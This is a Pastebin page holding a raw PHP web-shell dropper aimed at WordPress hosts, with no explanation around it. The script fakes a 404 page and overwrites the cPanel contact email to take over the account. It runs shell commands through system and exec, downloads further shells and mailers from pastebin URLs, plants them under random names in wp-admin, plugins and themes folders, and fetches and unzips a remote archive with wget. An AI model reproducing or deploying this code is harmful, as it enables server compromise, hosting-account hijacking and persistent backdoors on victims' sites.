API tools faq
paste
Advertisement
Guest User

mgharba_zwamal

a guest
Jan 28th, 2018
364
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.69 KB | None | 0 0
raw download clone embed print report diff
  1. $azerty = $_SERVER["SERVER_NAME"];
  2. $abcd = dirname($_SERVER["PHP_SELF"]);
  3. $sexterss = $azerty.$abcd;
  4. $azzouz = $_SERVER['HTTP_HOST'];
  5. echo'<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL files was not found on this server.</p><h2 hidden>rotinabox@hotmail.com</h2>
  6. <p>Additionally, a 404 error Not Found was encountered while trying to use an ErrorDocument to handle the request.</p>';
  7. $filt = getcwd();
  8. $fuck = explode("/",$filt);
  9. $user = $fuck[2];
  10. $email = "dexterkh1212x@gmail.com";
  11. $wr = 'email:'.$email;
  12. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  13. fwrite($f, $wr);fclose($f);$f = fopen('/home/'.$user.'/.contactinfo', 'w');fwrite($f, $wr); fclose($f);
  14. if(isset($_GET['user'])){echo "<br><br><font color='red'>$user</font><br><br>";}
  15. if(isset($_GET['kill'])){$a = basename($_SERVER['SCRIPT_NAME']);echo "<br><font color='blue'>GIF89a</font>";unlink($a);}
  16. function exe($cmd) {
  17. if(function_exists("system")) {
  18. @ob_start();
  19. @system($cmd);
  20. $buff = @ob_get_contents();
  21. @ob_end_clean();
  22. return $buff;
  23. } elseif(function_exists("exec")) {
  24. @exec($cmd,$results);
  25. $buff = "";
  26. foreach($results as $result) {
  27. $buff .= $result;
  28. } return $buff;
  29. } elseif(function_exists("passthru")) {
  30. @ob_start();
  31. @passthru($cmd);
  32. $buff = @ob_get_contents();
  33. @ob_end_clean();
  34. return $buff;
  35. } elseif(function_exists("shell_exec")) {
  36. $buff = @shell_exec($cmd);
  37. return $buff;
  38. }
  39. }
  40. $input = array('leopard','lion','male','cock','drake','penguin','quail','rat','serval','swan','bear','baboon','alpaca','zebra','yak','wolf','turkey','toad','baby','calf','cria','chick','fawn','pup','kit','nymph','swarm');
  41. $rand_keys = array_rand($input, 2);
  42. $random = $input[$rand_keys[0]];
  43. $leaf = $random;
  44. $system = $random;
  45. $tacos = $random;
  46. if(isset($_GET['olux'])){
  47. echo "<center>";
  48. if(eregi("get",$_GET["olux"])){
  49. $output = 'https://pastebin.com/raw/wL527WWg';
  50. $st = curl_init();
  51. curl_setopt($st,CURLOPT_URL,$output);
  52. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  53. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  54. $html = curl_exec($st);
  55. curl_close($st);
  56. $a1=fopen('output.php','w');
  57. fwrite($a1,$html);
  58. $authorze = 'https://pastebin.com/raw/nxJA9qiA';
  59. $st = curl_init();
  60. curl_setopt($st,CURLOPT_URL,$authorze);
  61. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  62. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  63. $html = curl_exec($st);
  64. curl_close($st);
  65. $a2=fopen('authorze.php','w');
  66. fwrite($a2,$html);
  67. $views = 'https://pastebin.com/raw/jWBjgLd2';
  68. $st = curl_init();
  69. curl_setopt($st,CURLOPT_URL,$views);
  70. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  71. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  72. $html = curl_exec($st);
  73. curl_close($st);
  74. $a3=fopen('views.php','w');
  75. fwrite($a3,$html);
  76. echo "<a href="."http://$sexterss/authorze.php"." target="."_blank".">$sexterss/authorze.php"."</a><br>";
  77. echo "<a href="."http://$sexterss/views.php?pass=ransomware"." target="."_blank".">$sexterss/views.php?pass=ransomware"."</a><br>";
  78. echo "<a href="."http://$sexterss/output.php"." target="."_blank".">$sexterss/output.php"."</a><br>";
  79. }
  80. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  81. foreach($sss as $pa){
  82. if(eregi("mailer",$_GET["olux"])){
  83. $p1=array("$pa/wp-admin/user/");
  84. foreach($p1 as $path){
  85. if (file_exists("$path")){
  86. $print = $path.$leaf.rand(999, 123).".php";
  87. $url = 'https://pastebin.com/raw/jWBjgLd2';
  88. $st = curl_init();
  89. curl_setopt($st,CURLOPT_URL,$url);
  90. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  91. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  92. $html = curl_exec($st);
  93. curl_close($st);
  94. $save=fopen($print,'w');
  95. fwrite($save,$html);
  96. $print = "__$print";
  97. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  98. echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  99. break;
  100. }
  101. $p2=array("$pa/wp-content/plugins/");
  102. foreach($p2 as $path){
  103. if (file_exists("$path")){
  104. $print = $path.$leaf.rand(999, 123).".php";
  105. $url = 'https://pastebin.com/raw/jWBjgLd2';
  106. $st = curl_init();
  107. curl_setopt($st,CURLOPT_URL,$url);
  108. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  109. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  110. $html = curl_exec($st);
  111. curl_close($st);
  112. $save=fopen($print,'w');
  113. fwrite($save,$html);
  114. $print = "__$print";
  115. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  116. echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  117. }}
  118. }}
  119. //////
  120. if(eregi("shell1",$_GET["olux"])){
  121. $p3=array("$pa/wp-admin/network/");
  122. foreach($p3 as $path){
  123. if (file_exists("$path")){
  124. $print = $path.$system.rand(999, 123).".php";
  125. $url = 'https://pastebin.com/raw/nxJA9qiA';
  126. $st = curl_init();
  127. curl_setopt($st,CURLOPT_URL,$url);
  128. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  129. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  130. $html = curl_exec($st);
  131. curl_close($st);
  132. $save=fopen($print,'w');
  133. fwrite($save,$html);
  134. $print = "__$print";
  135. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  136. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  137. break;
  138. }
  139. $p4=array("$pa/wp-content/languages/");
  140. foreach($p4 as $path){
  141. if (file_exists("$path")){
  142. $print = $path.$system.rand(999, 123).".php";
  143. $url = 'https://pastebin.com/raw/nxJA9qiA';
  144. $st = curl_init();
  145. curl_setopt($st,CURLOPT_URL,$url);
  146. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  147. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  148. $html = curl_exec($st);
  149. curl_close($st);
  150. $save=fopen($print,'w');
  151. fwrite($save,$html);
  152. $print = "__$print";
  153. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  154. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  155. }}
  156. }}
  157. //////
  158. $p5=array("$pa/wp-content/themes/");
  159. if(eregi("shell2",$_GET["olux"])){
  160. foreach($p5 as $path){
  161. if (file_exists("$path")){
  162. $print = $path.$tacos.rand(999, 123).".php";
  163. $url = 'https://pastebin.com/raw/wL527WWg';
  164. $st = curl_init();
  165. curl_setopt($st,CURLOPT_URL,$url);
  166. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  167. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  168. $html = curl_exec($st);
  169. curl_close($st);
  170. $save=fopen($print,'w');
  171. fwrite($save,$html);
  172. $print = "__$print";
  173. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  174. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  175. break;
  176. }
  177. $p6=array("$pa/wp-admin/");
  178. foreach($p6 as $path){
  179. if (file_exists("$path")){
  180. $print = $path.$tacos.rand(999, 123).".php";
  181. $url = 'https://pastebin.com/raw/wL527WWg';
  182. $st = curl_init();
  183. curl_setopt($st,CURLOPT_URL,$url);
  184. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  185. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  186. $html = curl_exec($st);
  187. curl_close($st);
  188. $save=fopen($print,'w');
  189. fwrite($save,$html);
  190. $print = "__$print";
  191. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  192. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  193. }}
  194. }
  195. }
  196. }
  197. if(eregi("unzip",$_GET["olux"])){
  198. exe("wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip");
  199. exe("unzip ms-authorze.zip");
  200. echo "<a href="."http://$sexterss/wp-authorze.php"." target="."_blank".">$sexterss/wp-authorze.php"."</a><br>";
  201. echo "<a href="."http://$sexterss/wp-views.php?pass=ransomware"." target="."_blank".">$sexterss/wp-views.php?pass=ransomware"."</a><br>";
  202. echo "<a href="."http://$sexterss/wp-output.php"." target="."_blank".">$sexterss/wp-output.php"."</a><br>";
  203. unlink("ms-authorze.zip");
  204. echo "</center>";
  205. }
  206. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!